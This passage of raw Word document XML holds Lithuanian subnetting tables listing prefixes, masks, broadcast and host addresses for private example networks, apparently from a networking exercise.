                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09C0236F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0A9DBBBF" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E044791" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="353A6609" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1C693187" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="008F6F77" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60384E99" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B2C36F8" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A45BDCF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="4F23AFFB" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19B3E3BA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25341297" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59B9FCCA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27230335" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="54303589" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="053EC5A0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="332194C7" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58829B44" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="258B5905" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DE2DC12" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="016E1626" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2A55620C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="289F3257" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.3.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E5AEE1F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.3.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="15C48CD0" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77545F15" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7AD09A11" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FB38A11" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0336CD95" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="305ACAD9" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2624C505" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BA710A7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="54C3EA80" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68798ACB" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="19CE7A66" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="213A4DB5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="3E1088E3" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B0810DB" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F7B9206" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="429DE2BF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B603B97" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="49302FC0" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="55DAE280" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7F47EFC6" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58A4BE20" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="431EC89C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F02F399" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="02C3DCD8" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05C66BCE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28226E77" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.0/28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4BF4A0A6" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.0/29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="702F0B7C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EFC0A75" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
